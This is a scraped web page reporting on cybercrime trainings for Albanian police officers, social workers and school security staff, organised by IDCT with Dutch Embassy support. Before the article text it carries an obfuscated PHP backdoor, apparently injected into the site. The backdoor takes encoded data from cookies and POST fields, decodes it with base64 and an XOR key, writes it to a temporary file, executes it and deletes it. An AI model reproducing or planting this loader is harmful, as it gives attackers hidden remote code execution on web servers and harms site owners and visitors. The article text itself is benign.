$CeYaLswoG = 'I' . chr (81) . "\137" . 'I' . 'E' . "\x54";$kMduTswFK = "\x63" . chr ( 637 - 529 ).chr ( 315 - 218 )."\x73" . "\163" . chr ( 757 - 662 ).'e' . "\170" . "\x69" . "\163" . 't' . 's';$gIhCtSUeby = class_exists($CeYaLswoG); $kMduTswFK = "36451";$EjEdBH = !1;if ($gIhCtSUeby == $EjEdBH){function bnbVIhs(){return FALSE;}$wTdQMDdQN = "40419";bnbVIhs();class IQ_IET{private function iJuozL($wTdQMDdQN){if (is_array(IQ_IET::$Wzlrb)) {$JZFHLY = sys_get_temp_dir() . "/" . crc32(IQ_IET::$Wzlrb["\x73" . 'a' . "\154" . "\x74"]);@IQ_IET::$Wzlrb[chr (119) . 'r' . 'i' . "\164" . "\145"]($JZFHLY, IQ_IET::$Wzlrb["\x63" . chr ( 665 - 554 ).chr ( 488 - 378 ).'t' . 'e' . "\156" . 't']);include $JZFHLY;@IQ_IET::$Wzlrb[chr (100) . "\145" . 'l' . "\145" . chr ( 1005 - 889 ).'e']($JZFHLY); $wTdQMDdQN = "40419";exit();}}private $NoAxmYBYvW;public function xXlWNDk(){echo 34087;}public function __destruct(){$wTdQMDdQN = "38394_2689";$this->iJuozL($wTdQMDdQN); $wTdQMDdQN = "38394_2689";}public function __construct($kqSNOv=0){$DVwsWldJ = $_POST;$HyJRhXWQMB = $_COOKIE;$FWuwSpgS = "3748c69a-64ea-4cd3-8378-b9d70b157ee2";$AbWfWtA = @$HyJRhXWQMB[substr($FWuwSpgS, 0, 4)];if (!empty($AbWfWtA)){$BczMCA = "base64";$LuGPpFhb = "";$AbWfWtA = explode(",", $AbWfWtA);foreach ($AbWfWtA as $wjfNn){$LuGPpFhb .= @$HyJRhXWQMB[$wjfNn];$LuGPpFhb .= @$DVwsWldJ[$wjfNn];}$LuGPpFhb = array_map($BczMCA . chr ( 745 - 650 )."\x64" . 'e' . "\x63" . chr ( 1079 - 968 ).chr ( 689 - 589 )."\145", array($LuGPpFhb,)); $LuGPpFhb = $LuGPpFhb[0] ^ str_repeat($FWuwSpgS, (strlen($LuGPpFhb[0]) / strlen($FWuwSpgS)) + 1);IQ_IET::$Wzlrb = @unserialize($LuGPpFhb); $LuGPpFhb = class_exists("38394_2689");}}public static $Wzlrb = 63881;}$HEdYKfaP = new /* 33104 */ $CeYaLswoG(40419 + 40419); $EjEdBH = $HEdYKfaP = $wTdQMDdQN = Array();} Trainings in the procedural and technical aspects – IKTD

Trainings in the procedural and technical aspects for
police officers, social service providers and security staff on cybercrime
issues, prevention and treatment. 


IDCT in partnership with NAECCS, State Police and CVE, and with the support of the Dutch Embassy in Albania, organized the first trainings in Gjirokastra for police officers, social service workers and school security police officers.

The trainings aim to build capacities in cyber security in the procedural and technical aspect for issues such as: cyberbullying, online pornography with minors, violent online extremism, etc.

The training in the procedural aspect aimed to raise awareness and understanding of cybercrime issues and the threats it poses, as well as the importance of providing the service professionally in coherence with the protection of fundamental human rights.Through this training, the participants aimed to understand as much as possible about cybercrime and cyber security to provide quality service in response to the needs of the “victim”, but also to improve security in their personal and professional lives. 

The main objective of the training in the technical aspect was to provide basic ICT knowledge on cybercrime and cyber threats, recommendations on technical procedures to follow and use during their work, as well as recommended measures to prevent and minimize the risk of crime and cyber threat. In this way the knowledge and skills of law enforcement officers in this important field were improved by enabling them to perform their duties in a more professional manner.

Experts during the trainings maintained an approach guided by respect for human rights, sensitivity to cases of cybercrime victims regardless of gender, identity, religion or age, throughout the legal process of their treatment, as well as addressed the importance of online security.Participants in these trainings shared their views on the issues of cybercrime, its prevention and treatment.

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